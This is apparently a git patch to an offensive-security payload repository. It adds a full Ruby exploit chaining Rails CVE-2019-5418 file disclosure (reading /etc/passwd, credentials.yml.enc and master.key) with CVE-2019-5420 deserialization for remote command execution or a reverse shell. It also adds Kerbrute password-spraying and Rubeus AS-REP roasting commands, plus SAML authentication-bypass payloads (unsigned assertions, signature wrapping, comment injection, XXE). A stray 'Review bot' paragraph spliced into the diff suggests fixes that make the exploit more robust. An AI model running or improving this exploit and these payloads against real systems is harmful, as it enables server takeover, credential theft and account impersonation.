From 5d1b8bca79a4efc422a4cd809bfe86a81ba74f82 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Sun, 24 Mar 2019 13:16:23 +0100
Subject: [PATCH] SAML exploitation + ASREP roasting + Kerbrute
---
 CVE Exploits/Rails CVE-2019-5420.rb | 156 ++++++++++++++++
 JSON Web Token/README.md | 6 +-
 .../Active Directory Attack.md | 54 ++++++
 SAML Injection/Images/SAML-xml-flaw.png | Bin 0 -> 8907 bytes
 SAML Injection/README.md | 168 ++++++++++++++++++
 _template_vuln/README.md | 11 +-
 6 files changed, 389 insertions(+), 6 deletions(-)
 create mode 100644 CVE Exploits/Rails CVE-2019-5420.rb
 create mode 100644 SAML Injection/Images/SAML-xml-flaw.png
 create mode 100644 SAML Injection/README.md
diff --git a/CVE Exploits/Rails CVE-2019-5420.rb b/CVE Exploits/Rails CVE-2019-5420.rb
new file mode 100644
index 0000000..647f03f
--- /dev/null
+++ b/CVE Exploits/Rails CVE-2019-5420.rb
@@ -0,0 +1,156 @@ +require 'erb' +require "./demo-5.2.1/config/environment" +require "base64" +require 'net/http' + +$proxy_addr = '127.0.0.1' +$proxy_port = 8080 + +$remote = "http://172.18.0.3:3000" +$ressource = "/demo" + +puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n" + +print "[+] Checking if vulnerable to CVE-2019-5418 => " +uri = URI($remote + $ressource) +req = Net::HTTP::Get.new(uri) +req['Accept'] = "../../../../../../../../../../etc/passwd{{" +res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| + http.request(req) +} +if res.body.include? "root:x:0:0:root:" + puts "\033[92mOK\033[0m" +else + puts "KO" + abort +end + +print "[+] Getting file => credentials.yml.enc => " +path = "../../../../../../../../../../config/credentials.yml.enc{{" +for $i in 0..9 + uri = URI($remote + $ressource) + req = Net::HTTP::Get.new(uri) + req['Accept'] = path[3..57] + res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| + http.request(req) + } + if res.code == "200" + puts "\033[92mOK\033[0m" + File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) } + break + end + path = path[3..57] + $i +=1; +end + +print "[+] Getting file => master.key => " +path = "../../../../../../../../../../config/master.key{{" +for $i in 0..9 + uri = URI($remote + $ressource) + req = Net::HTTP::Get.new(uri) + req['Accept'] = path[3..57] + res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| + http.request(req) + } + if res.code == "200" + puts "\033[92mOK\033[0m" + File.open("master.key", 'w') { |file| file.write(res.body) } + break + end + path = path[3..57] + $i +=1; +end + +print "[+] Decrypt secret_key_base => " +credentials_config_path = File.join("../", "credentials.yml.enc") +credentials_key_path = File.join("../", "master.key") +ENV["RAILS_MASTER_KEY"] = res.body +credentials = ActiveSupport::EncryptedConfiguration.new( + config_path: Rails.root.join(credentials_config_path), + 
key_path: Rails.root.join(credentials_key_path), + env_key: "RAILS_MASTER_KEY", + raise_if_missing_key: true +) +if credentials.secret_key_base != nil + puts "\033[92mOK\033[0m" + puts "" + puts "secret_key_base": credentials.secret_key_base + puts "" +end + +puts "[+] Getting reflective command (R) or reverse shell (S) => " +loop do + begin + input = [(print 'Select option R or S: '), gets.rstrip][1] + if input == "R" + puts "Reflective command selected" + command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1] + elsif input == "S" + puts "Reverse shell selected" + command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1] + else + puts "No option selected" + abort + end + + command_b64 = Base64.encode64(command) + + print "[+] Generating payload CVE-2019-5420 => " + secret_key_base = credentials.secret_key_base + key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000)) + secret = key_generator.generate_key("ActiveStorage") + verifier = ActiveSupport::MessageVerifier.new(secret) + if input == "R" + code = "system('bash','-c','" + command + " > /tmp/result.txt')" + else + code = "system('bash','-c','" + command + "')" + end + erb = ERB.allocate + erb.instance_variable_set :@src, code + erb.instance_variable_set :@filename, "1" + erb.instance_variable_set :@lineno, 1 + dump_target = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result + + puts "\033[92mOK\033[0m" + puts "" + url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test" + puts url + puts "" + + print "[+] Sending request => " + uri = URI(url) + req = Net::HTTP::Get.new(uri) + req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| + http.request(req) + } + if res.code == "500" + puts "\033[92mOK\033[0m" + else + puts "KO" 
+ abort + end + + if input == "R" + print "[+] Getting result of command => " + uri = URI($remote + $ressource) + req = Net::HTTP::Get.new(uri) + req['Accept'] = "../../../../../../../../../../tmp/result.txt{{" + res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| + http.request(req) + } + if res.code == "200" + puts "\033[92mOK\033[0m\n\n" + puts res.body + puts "\n" + else + puts "KO" + abort + end + end + + rescue Exception => e + puts "Exiting..." + abort + end +end diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 6a89ce3..3e88b88 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -13,6 +13,7 @@ - [jwt_tool](https://github.com/ticarpi/jwt_tool) - [c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker) +- [JOSEPH - JavaScript Object Signing and Encryption Pentesting Helper](https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61) ## JWT Format 
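Review bot: The credentials.yml.enc and master.key retrieval loops never fail the run when none of the ten attempts returns 200, so `ENV["RAILS_MASTER_KEY"] = res.body` and the EncryptedConfiguration decrypt step then operate on the body of the last error response; a guard after each loop, `abort "KO" unless res.code == "200"`, keeps that failure path as explicit as the initial CVE-2019-5418 check. In the same hunk, `rescue Exception => e` also traps SystemExit and Interrupt, so the `abort` calls inside the block and a Ctrl-C both surface as "Exiting..."; `rescue StandardError` is the idiomatic form, and the unused `e` can go. `puts "secret_key_base": credentials.secret_key_base` passes a one-entry Hash, so it prints `{:secret_key_base=>"..."}` rather than the intended line; `puts "secret_key_base: #{credentials.secret_key_base}"` fixes that. The script also depends on a checked-out `./demo-5.2.1` Rails app and routes every request through a proxy at 127.0.0.1:8080 via the `$proxy_addr`/`$proxy_port` globals; a header comment stating both prerequisites, and that `$remote`/`$ressource` are lab-specific values to edit, would save the next reader a stack trace on the first `Net::HTTP.start`.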
@@ -227,4 +228,7 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/) - [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//) - [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens) -- [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750) \ No newline at end of file +- [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750) +- [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/) +- [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) +- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 1847667..0dad93f 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -13,6 +13,7 @@ * [Silver Tickets](#passtheticket-silver-tickets) * [Trust Tickets](#trust-tickets) * [Kerberoast](#kerberoast) + * [KRB_AS_REP roasting](#krb_as_rep-roasting) * [Pass-the-Hash](#pass-the-hash) * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) 
@@ -20,6 +21,7 @@ * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [PrivExchange attack](#privexchange-attack) + * [Password spraying](#password-spraying) * [Privilege Escalation](#privilege-escalation) * [PrivEsc Local Admin - Token Impersonation (RottenPotato)](#privesc-local-admin---token-impersonation-rottenpotato) * [PrivEsc Local Admin - MS16-032](#privesc-local-admin---ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) @@ -74,6 +76,12 @@ pingcastle.exe --healthcheck --server --user --password --advanced-live --nullsession ``` +* [Kerbrute](https://github.com/ropnop/kerbrute) + + ```powershell + ./kerbrute passwordspray -d + ``` + ## Most common paths to AD compromise ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) 
@@ -380,6 +388,42 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt ./john ~/hash.txt --wordlist=rockyou.lst ``` +### KRB_AS_REP Roasting + +If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting + +```powershell +C:\>git clone https://github.com/GhostPack/Rubeus#asreproast +C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user + + ______ _ +(_____ \ | | + _____) )_ _| |__ _____ _ _ ___ +| __ /| | | | _ \| ___ | | | |/___) +| | \ \| |_| | |_) ) ____| |_| |___ | +|_| |_|____/|____/|_____)____/(___/ + +v1.3.4 + + +[*] Action: AS-REP roasting + +[*] Target User : TestOU3user +[*] Target Domain : testlab.local + +[*] SamAccountName : TestOU3user +[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local +[*] Using domain controller: testlab.local (192.168.52.100) +[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user' +[*] Connecting to 192.168.52.100:88 +[*] Sent 169 bytes +[*] Received 1437 bytes +[+] AS-REQ w/o preauth successful! +[*] AS-REP hash: + + $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... +``` + ### Pass-the-Hash The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. 
@@ -498,6 +542,16 @@ Alternatively you can use the Metasploit module [`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420) +### Password spraying + +Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. + +```powershell +root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt +root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 +``` + + ## Privilege Escalation ### PrivEsc Local Admin - Token Impersonation (RottenPotato) 
diff --git a/SAML Injection/Images/SAML-xml-flaw.png b/SAML Injection/Images/SAML-xml-flaw.png new file mode 100644 index 0000000000000000000000000000000000000000..b014a49b58018ee8c862d09017359992bb140a0d GIT binary patch literal 8907 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 literal 0 HcmV?d00001 diff --git a/SAML Injection/README.md b/SAML Injection/README.md new file mode 100644 index 0000000..ad6ae16 --- /dev/null +++ b/SAML Injection/README.md 
@@ -0,0 +1,168 @@ +# SAML Injection + +> Security Assertion Markup Language (SAML) is an open standard that allows security credentials to be shared by multiple computers across a network. When using SAML-based Single Sign-On (SSO), three distinct parties are involved. There is a user (the so-called principal), an IDentity Provider (IDP), and a cloud application Service Provider (SP). - centrify + +## Summary + +* [Tools](#tools) +* [Authentication Bypass](#authentication-bypass) + * [Invalid Signature](#invalid-signature) + * [Signature Stripping](#signature-stripping) + * [XML Signature Wrapping Attacks](#xml-signature-wrapping-attacks) + * [XML Comment Handling](#xml-comment-handling) + * [XML External Entity](#xml-external-entity) + +## Tools + +- [SAML Raider - Burp Extension](https://github.com/SAMLRaider/SAMLRaider) + + +## Authentication Bypass + +A SAML Response should contain the ` [...]accepting unsigned SAML assertions is accepting a username without checking the password - @ilektrojohn + +The goal is to forge a well formed SAML Assertion without signing it. For some default configurations if the signature section is omitted from a SAML response, then no signature verification is performed. + +Example of SAML assertion where `NameID=admin` without signature. + +```xml + + + REDACTED + + + + + REDACTED + + admin + + + + + + + WLS_SP + + + + + urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport + + + + +``` + +### XML Signature Wrapping Attacks + +XML Signature Wrapping (XSW) attack, some implementations check for a valid signature and match it to a valid assertion, but do not check for multiple assertions, multiple signatures, or behave differently depending on the order of assertions. + +- XSW1 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response after the existing signature. +- XSW2 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response before the existing signature. 
+- XSW3 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion before the existing Assertion. +- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion after the existing Assertion. +- XSW5 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed at the end of the SAML message. +- XSW6 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed after the original signature. +- XSW7 – Applies to SAML Assertion messages. Add an “Extensions” block with a cloned unsigned assertion. +- XSW8 – Applies to SAML Assertion messages. Add an “Object” block containing a copy of the original assertion with the signature removed. + + +In the following example, these terms are used. + +- FA: Forged Assertion +- LA: Legitimate Assertion +- LAS: Signature of the Legitimate Assertion + +```xml + + + Attacker + + + Legitimate User + + + + + + +``` + +In the Github Enterprise vulnerability, this request would verify and create a sessions for `Attacker` instead of `Legitimate User`, even if `FA` is not signed. + + +### XML Comment Handling + +A threat actor who already has authenticated access into a SSO system can authenticate as another user without that individual’s SSO password. This [vulnerability](https://www.bleepstatic.com/images/news/u/986406/attacks/Vulnerabilities/SAML-flaw.png) has multiple CVE in the following libraries and products. 
+ +- OneLogin - python-saml - CVE-2017-11427 +- OneLogin - ruby-saml - CVE-2017-11428 +- Clever - saml2-js - CVE-2017-11429 +- OmniAuth-SAML - CVE-2017-11430 +- Shibboleth - CVE-2018-0489 +- Duo Network Gateway - CVE-2018-7340 + +Researchers have noticed that if an attacker inserts a comment inside the username field in such a way that it breaks the username, the attacker might gain access to a legitimate user's account. + +```xml + + https://idp.com/ + + + user@user.com.evil.com +``` +Where `user@user.com` is the first part of the username, and `.evil.com` is the second. + +### XML External Entity + +An alternative exploitation would use `XML entities` to bypass the signature verification, since the content will not change, except during XML parsing. + +In the following example: +- `&s;` will resolve to the string `"s"` +- `&f1;` will resolve to the string `"f1"` + +```xml + + + +]> + +[...] + + + &s;taf&f1; + + +[...] + +``` + +The SAML response is accepted by the service provider. Due to the vulnerability, the service provider application reports "taf" as the value of the "uid" attribute. 
+ +## References + +- [SAML Burp Extension - ROLAND BISCHOFBERGER - JULY 24, 2015](https://blog.compass-security.com/2015/07/saml-burp-extension/) +- [The road to your codebase is paved with forged assertions - @ilektrojohn - March 13, 2017](http://www.economyofmechanism.com/github-saml) +- [SAML_Security_Cheat_Sheet.md - OWASP](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SAML_Security_Cheat_Sheet.md) +- [On Breaking SAML: Be Whoever You Want to Be - Juraj Somorovsky, Andreas Mayer, Jorg Schwenk, Marco Kampmann, and Meiko Jensen](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91-8-23-12.pdf) +- [Making Headlines: SAML - March 19, 2018 - Torsten George](https://blog.centrify.com/saml/) +- [Vulnerability Note VU#475445 - 2018-02-27 - Carnegie Mellon University](https://www.kb.cert.org/vuls/id/475445/) 